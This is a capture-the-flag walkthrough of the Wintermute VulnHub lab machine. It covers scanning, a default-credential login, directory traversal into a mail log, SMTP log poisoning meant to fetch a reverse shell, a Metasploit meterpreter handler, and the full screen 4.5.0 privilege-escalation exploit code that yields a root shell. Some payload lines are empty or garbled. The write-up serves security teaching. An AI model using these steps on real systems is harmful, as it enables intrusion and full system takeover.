WinterMute_1 (VULHUB)

VM LINK: https://download.vulnhub.com/wintermute/Wintermute-v1.zip

root@kali:~# netdiscover -i eth0

root@kali:~# nmap -p- -A 192.168.1.124

port : 25 , 80 , 3000

on browser

http://192.168.1.124

http://192.168.1.124:3000

username : admin
password : admin

and we are in

On clicking the Flows option, we were redirected to the following page:

Here we observed few directories were listed (as shown in screenshot above), hence we thought of appending them to our URL http://192.168.1.124/ OR http://192.168.1.124:3000/

We tried accessing http://192.168.1.124:3000/turing-bolo/ however no success . Then we browsed the URL http://192.168.1.124/turing-bolo/ and got below page

http://192.168.1.124/turing-bolo/

Click on Submit Query and we are redirected to the following page

http://192.168.1.124/turing-bolo/bolo.php?bolo=case

From the above screenshot we can see few log files (as highlighted).Per our experience , this could be an indication of Directory traversal where we can execute writeable files in the browser .Hence let’s try to append ../../../log/mail to the URL in the browser as follows :

http://192.168.1.124/turing-bolo/bolo.php?bolo=../../../log/mail

Now let’s try to enumerate further and connect to the SMTP (25) port

root@kali:~# telnet 192.168.1.124 25

MAIL FROM:<rrajchandel@gmail.com></rrajchandel@gmail.com>

RCPT TO: shell.elf

root@kali:~# python -m SimpleHTTPServer 80

As we got success in receiving the response of OS commands in the email log files, in a similar way there is a possibility that following this method ,we may also get the Meterpreter access of the victim machine

Hence as seen in the below screenshot , we will pass the commands in RCPT command as follows :

1.Navigate to /tmp directory and Download the shell.elf file from Kali machine

2.Modify the permissions of the shell.elf file

3.Execute our Reverse shell (shell.elf) file

RCPT TO:

RCPT TO:

RCPT TO:

Now in parallel, open the Metasploit console and perform the following

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.134
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

meterpreter > sysinfo

meterpreter > shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@straylight:/$ find / -perm -4000 2>/dev/null

now on another terminal

root@kali:~# searchsploit screen 4.5.0

root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/41154.sh

https://www.exploit-db.com/exploits/41154/

root@kali:~# gedit libhax.c

#include
#include
#include
__attribute__ ((__constructor__))
void dropshell(void){
chown(“/tmp/rootshell”, 0, 0);
chmod(“/tmp/rootshell”, 04755);
unlink(“/etc/ld.so.preload”);
printf(“[+] done!\n”);
}

root@kali:~# gedit rootshell.c

#include
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp(“/bin/sh”, NULL, NULL);
}

Now go back to the Meterpreter session and upload the exploit files from Kali machine Meterpreter session to the /tmp directory of the target (victim) machine.

meterpreter > upload libhax.c /tmp

meterpreter > upload rootshell.c /tmp

meterpreter > shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@straylight:/$ gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

www-data@straylight:/$ gcc -o /tmp/rootshell /tmp/rootshell.c

www-data@straylight:/$ cd /etc
www-data@straylight:/$ unmask 000
www-data@straylight:/$ screen -D -m -L ld.so.preload echo -ne “\x0a/tmp/libhax.so”
www-data@straylight:/$ screen -ls

www-data@straylight:/$ /tmp/rootshell

# cd /root

Let’s see what file it contains

# ls

# cat flag.txt

# cat note.txt

@SAKSHAM DIXIT